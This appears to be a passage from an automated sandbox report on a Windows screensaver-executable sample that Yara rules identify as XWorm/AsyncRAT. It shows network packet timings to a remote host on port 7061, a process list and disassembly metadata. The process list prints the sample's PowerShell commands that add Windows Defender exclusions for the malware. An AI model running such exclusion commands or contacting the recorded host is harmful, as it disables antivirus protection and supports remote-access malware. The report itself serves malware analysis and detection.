                                                                  Dec 2, 2024 22:07:12.915369034 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:13.035527945 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:13.148653984 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:13.194473028 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:13.402065992 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:13.403769970 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:13.524029016 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:13.525670052 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:13.834569931 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:13.914412975 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:13.917717934 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:13.920690060 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:13.954539061 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:14.040457964 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:14.040501118 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:14.040543079 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:14.040607929 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:14.160507917 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:17.678581953 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:17.798671961 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:18.263880014 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:18.266927004 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:18.386986017 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:22.256923914 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:22.377634048 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:23.913779020 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:23.922106028 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:24.042448044 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:27.928879976 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:28.048846960 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:28.048914909 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:28.168952942 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:28.169006109 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:28.288964033 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:28.289012909 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:28.409158945 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:28.501241922 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:28.502758980 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:28.623426914 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:28.740956068 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:28.743181944 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:28.863137960 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:28.978533030 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:28.983450890 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:29.103468895 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:29.219259977 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:29.221133947 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:29.341167927 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:36.709968090 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:36.830068111 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:37.278608084 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:37.285939932 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:37.406148911 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:38.429054976 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:38.549060106 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:39.555198908 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:39.557442904 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:39.677411079 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:43.140970945 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:43.193994999 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:43.772524118 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:43.892657995 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:44.372756958 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:44.374746084 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:44.494761944 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:48.913233995 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:49.033355951 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:49.033828020 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:49.153762102 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:49.482575893 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:49.491447926 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:49.611474991 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:49.718348026 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:49.719945908 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:49.839976072 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:50.008027077 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:50.009605885 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:50.129554987 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:59.211455107 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:59.331732988 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:59.334839106 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:59.455020905 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:59.663360119 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:07:59.783837080 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:59.940547943 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:07:59.947483063 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:08:00.067471981 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:08:00.271030903 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:08:00.275330067 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:08:00.395303011 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:08:00.543720007 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:08:00.545397997 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:08:00.666059017 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:08:04.381880045 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:08:04.501849890 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:08:05.428683043 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:08:05.431453943 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:08:05.551667929 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:08:13.145221949 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:08:13.197566032 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:08:15.633912086 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:08:15.754177094 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:08:16.208355904 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:08:16.212491035 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:08:16.332474947 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:08:26.725738049 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:08:26.845794916 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:08:27.338645935 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:08:27.342286110 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:08:27.462321043 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:08:35.944509983 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:08:36.064764023 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:08:36.499974966 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:08:36.503489017 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:08:36.623514891 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:08:40.413191080 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:08:40.533292055 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:08:40.533340931 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:08:40.654552937 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:08:40.998799086 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:08:41.001640081 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:08:41.121572971 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:08:41.258518934 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:08:41.260236979 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:08:41.380206108 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:08:42.616349936 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:08:42.736371040 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:08:43.139673948 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:08:43.194175959 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:08:43.438468933 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:08:43.440421104 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:08:43.560451984 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:08:49.963525057 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:08:50.105777979 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:08:50.521750927 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:08:50.527074099 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:08:50.647620916 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:09:01.755162954 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:09:01.875982046 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:09:02.341593027 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:09:02.344563007 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:09:02.464436054 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:09:07.475615978 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:09:07.597100973 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:09:08.038301945 CET706149770104.250.180.178192.168.2.6
                                                                  Dec 2, 2024 22:09:08.039041042 CET497707061192.168.2.6104.250.180.178
                                                                  Dec 2, 2024 22:09:08.158978939 CET706149770104.250.180.178192.168.2.6

                                                                  Statistics

                                                                  CPU Usage

                                                                  Click to jump to process

                                                                  Memory Usage

                                                                  Click to jump to process

                                                                  High Level Behavior Distribution

                                                                  Click to dive into process behavior distribution

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  General

                                                                  Target ID:0
                                                                  Start time:16:04:57
                                                                  Start date:02/12/2024
                                                                  Path:C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe"
                                                                  Imagebase:0xc10000
                                                                  File size:516'096 bytes
                                                                  MD5 hash:DD81E5AFCD1A13EEE9F9A28C6CDE2A56
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2157295618.0000000003071000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2157295618.0000000003071000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:3
                                                                  Start time:16:05:03
                                                                  Start date:02/12/2024
                                                                  Path:C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe"
                                                                  Imagebase:0xf00000
                                                                  File size:516'096 bytes
                                                                  MD5 hash:DD81E5AFCD1A13EEE9F9A28C6CDE2A56
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.4573179094.0000000003301000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.4558499352.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000002.4558499352.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                  Reputation:low
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:4
                                                                  Start time:16:05:06
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe'
                                                                  Imagebase:0x550000
                                                                  File size:433'152 bytes
                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:5
                                                                  Start time:16:05:06
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff66e660000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:7
                                                                  Start time:16:05:11
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'THITWNSEI24112908089786756456545346568789-00010.scr.exe'
                                                                  Imagebase:0x550000
                                                                  File size:433'152 bytes
                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:8
                                                                  Start time:16:05:11
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff66e660000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:10
                                                                  Start time:16:05:15
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
                                                                  Imagebase:0x550000
                                                                  File size:433'152 bytes
                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:11
                                                                  Start time:16:05:15
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff66e660000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:14
                                                                  Start time:16:05:20
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
                                                                  Imagebase:0x550000
                                                                  File size:433'152 bytes
                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:15
                                                                  Start time:16:05:20
                                                                  Start date:02/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff66e660000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Disassembly

                                                                  Reset < >

                                                                    Execution Graph

                                                                    Execution Coverage:7.6%
                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:37
                                                                    Total number of Limit Nodes:5
                                                                    execution_graph 15821 2e7acf0 15825 2e7add8 15821->15825 15830 2e7ade8 15821->15830 15822 2e7acff 15826 2e7adf9 15825->15826 15827 2e7ae1c 15825->15827 15826->15827 15828 2e7b020 GetModuleHandleW 15826->15828 15827->15822 15829 2e7b04d 15828->15829 15829->15822 15831 2e7ae1c 15830->15831 15832 2e7adf9 15830->15832 15831->15822 15832->15831 15833 2e7b020 GetModuleHandleW 15832->15833 15834 2e7b04d 15833->15834 15834->15822 15835 2e74668 15836 2e7467a 15835->15836 15837 2e74686 15836->15837 15839 2e74778 15836->15839 15840 2e7479d 15839->15840 15844 2e74888 15840->15844 15848 2e74878 15840->15848 15846 2e748af 15844->15846 15845 2e7498c 15845->15845 15846->15845 15852 2e744b4 15846->15852 15849 2e748af 15848->15849 15850 2e7498c 15849->15850 15851 2e744b4 CreateActCtxA 15849->15851 15851->15850 15853 2e75918 CreateActCtxA 15852->15853 15855 2e759cf 15853->15855 15856 2e7d478 15857 2e7d4be 15856->15857 15861 2e7d647 15857->15861 15864 2e7d658 15857->15864 15858 2e7d5ab 15867 2e7b7d0 15861->15867 15865 2e7d686 15864->15865 15866 2e7b7d0 DuplicateHandle 15864->15866 15865->15858 15866->15865 15868 2e7d6c0 DuplicateHandle 15867->15868 15869 2e7d686 15868->15869 15869->15858

                                                                    Executed Functions

                                                                    Function 02E7ADE8 Relevance: 1.7, APIs: 1, Instructions: 195COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 02E7B03E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2156883489.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2e70000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule
                                                                    • String ID:
                                                                    • API String ID: 4139908857-0
                                                                    • Opcode ID: 96cafbb635486524585d9103635c2e354e0571eff35067fb2fa96a220e7a938f
                                                                    • Instruction ID: b2dc774b7c5d60644818f6cc34149ca62344d2d5b37ad730acbae21d5386c4f8
                                                                    • Opcode Fuzzy Hash: 96cafbb635486524585d9103635c2e354e0571eff35067fb2fa96a220e7a938f
                                                                    • Instruction Fuzzy Hash: 0B710470A00B058FE728DF69D54475ABBF1FF88304F00992DD48A97B40DB75E845CB95
                                                                    Function 02E744B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 57 2e744b4-2e759d9 CreateActCtxA 60 2e759e2-2e75a3c 57->60 61 2e759db-2e759e1 57->61 68 2e75a3e-2e75a41 60->68 69 2e75a4b-2e75a4f 60->69 61->60 68->69 70 2e75a51-2e75a5d 69->70 71 2e75a60-2e75a90 69->71 70->71 75 2e75a42-2e75a4a 71->75 76 2e75a92-2e75b14 71->76 75->69 79 2e759cf-2e759d9 75->79 79->60 79->61
                                                                    APIs
                                                                    • CreateActCtxA.KERNEL32(?), ref: 02E759C9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2156883489.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2e70000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID: Create
                                                                    • String ID:
                                                                    • API String ID: 2289755597-0
                                                                    • Opcode ID: 81f0124ed852fc6bc35dc9d50ca04d27ad630252e980aaa17addea375568ff3f
                                                                    • Instruction ID: 2096f13c12f36946aea6398d4d94637a181a53f9a820a8e956743876ea5b5721
                                                                    • Opcode Fuzzy Hash: 81f0124ed852fc6bc35dc9d50ca04d27ad630252e980aaa17addea375568ff3f
                                                                    • Instruction Fuzzy Hash: 2841C171C0071DCBEB24CFA9C984BDEBBB5BF48704F60816AD809AB251DBB56945CF90
                                                                    Function 02E7590C Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 80 2e7590c-2e75913 81 2e7591c-2e759d9 CreateActCtxA 80->81 83 2e759e2-2e75a3c 81->83 84 2e759db-2e759e1 81->84 91 2e75a3e-2e75a41 83->91 92 2e75a4b-2e75a4f 83->92 84->83 91->92 93 2e75a51-2e75a5d 92->93 94 2e75a60-2e75a90 92->94 93->94 98 2e75a42-2e75a4a 94->98 99 2e75a92-2e75b14 94->99 98->92 102 2e759cf-2e759d9 98->102 102->83 102->84
                                                                    APIs
                                                                    • CreateActCtxA.KERNEL32(?), ref: 02E759C9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2156883489.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2e70000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID: Create
                                                                    • String ID:
                                                                    • API String ID: 2289755597-0
                                                                    • Opcode ID: 5c878dc672486c2bdb6ff04ee1dbdf6304fd8ace457b51798276e534bf929832
                                                                    • Instruction ID: 7753693587dec5b936860d8d16dbdde415f15953908ce386cdc77036f87021c6
                                                                    • Opcode Fuzzy Hash: 5c878dc672486c2bdb6ff04ee1dbdf6304fd8ace457b51798276e534bf929832
                                                                    • Instruction Fuzzy Hash: 0341D1B1C00719CBEF24DFA9C9847DDBBB5BF48304F60816AD418AB251DBB5694ACF50
                                                                    Function 02E7B7D0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 103 2e7b7d0-2e7d754 DuplicateHandle 105 2e7d756-2e7d75c 103->105 106 2e7d75d-2e7d77a 103->106 105->106
                                                                    APIs
                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02E7D686,?,?,?,?,?), ref: 02E7D747
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2156883489.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2e70000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID: DuplicateHandle
                                                                    • String ID:
                                                                    • API String ID: 3793708945-0
                                                                    • Opcode ID: 3fb230eb60ba3903f636bdb51ffc8d533dae05c274661432e91969aad93682be
                                                                    • Instruction ID: 7c4cc569a49566a9d14972e8d2b73e67a59c4a2e02d792de14a1bc931ec0baf6
                                                                    • Opcode Fuzzy Hash: 3fb230eb60ba3903f636bdb51ffc8d533dae05c274661432e91969aad93682be
                                                                    • Instruction Fuzzy Hash: EB21E3B5900249DFDB10CF9AD984AEEBBF9EF48320F14845AE918A3310D375A950CFA5
                                                                    Function 02E7D6B9 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 109 2e7d6b9-2e7d754 DuplicateHandle 110 2e7d756-2e7d75c 109->110 111 2e7d75d-2e7d77a 109->111 110->111
                                                                    APIs
                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02E7D686,?,?,?,?,?), ref: 02E7D747
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2156883489.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2e70000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID: DuplicateHandle
                                                                    • String ID:
                                                                    • API String ID: 3793708945-0
                                                                    • Opcode ID: fd5754a4252087f86ef56fa65f074aac65aa02a32bf29b2a6264f07dbccb628c
                                                                    • Instruction ID: de914328fcc2a48335bfba3028a7220ad4a4e378736627e38f93a56fec0a5756
                                                                    • Opcode Fuzzy Hash: fd5754a4252087f86ef56fa65f074aac65aa02a32bf29b2a6264f07dbccb628c
                                                                    • Instruction Fuzzy Hash: 6121E0B5900209DFDB10CFAAD984AEEBBF5FF48324F14845AE918B3210D378A954CF60
                                                                    Function 02E7AFD8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
